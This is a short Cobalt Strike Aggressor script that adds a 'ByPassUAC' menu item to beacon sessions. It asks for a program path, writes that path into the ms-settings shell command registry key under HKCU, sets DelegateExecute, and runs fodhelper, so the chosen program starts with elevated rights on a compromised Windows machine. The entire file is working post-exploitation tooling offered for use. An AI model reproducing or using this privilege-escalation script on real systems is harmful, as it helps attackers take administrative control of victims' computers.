popup beacon_bottom {
	menu "ByPassUAC" {
		item "Path" {
			$bid = $1['@'];
		    $Dialog = dialog("BypassUAC", %(shell_path => "",bid => $bid),&bypass_run);
		    drow_text($Dialog, "shell_path", "Input Your Path: ");
		    dbutton_action($Dialog, "运行");
		    dialog_show($Dialog);
		}
		sub bypass_run{
		    local('$Name');
		    $Name = $3['shell_path'];
			bpowershell($bid, "New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value $+ $Name -Force");
			bpowershell($bid, "New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force");
			bpowershell($bid, "fodhelper");
		}
	}
}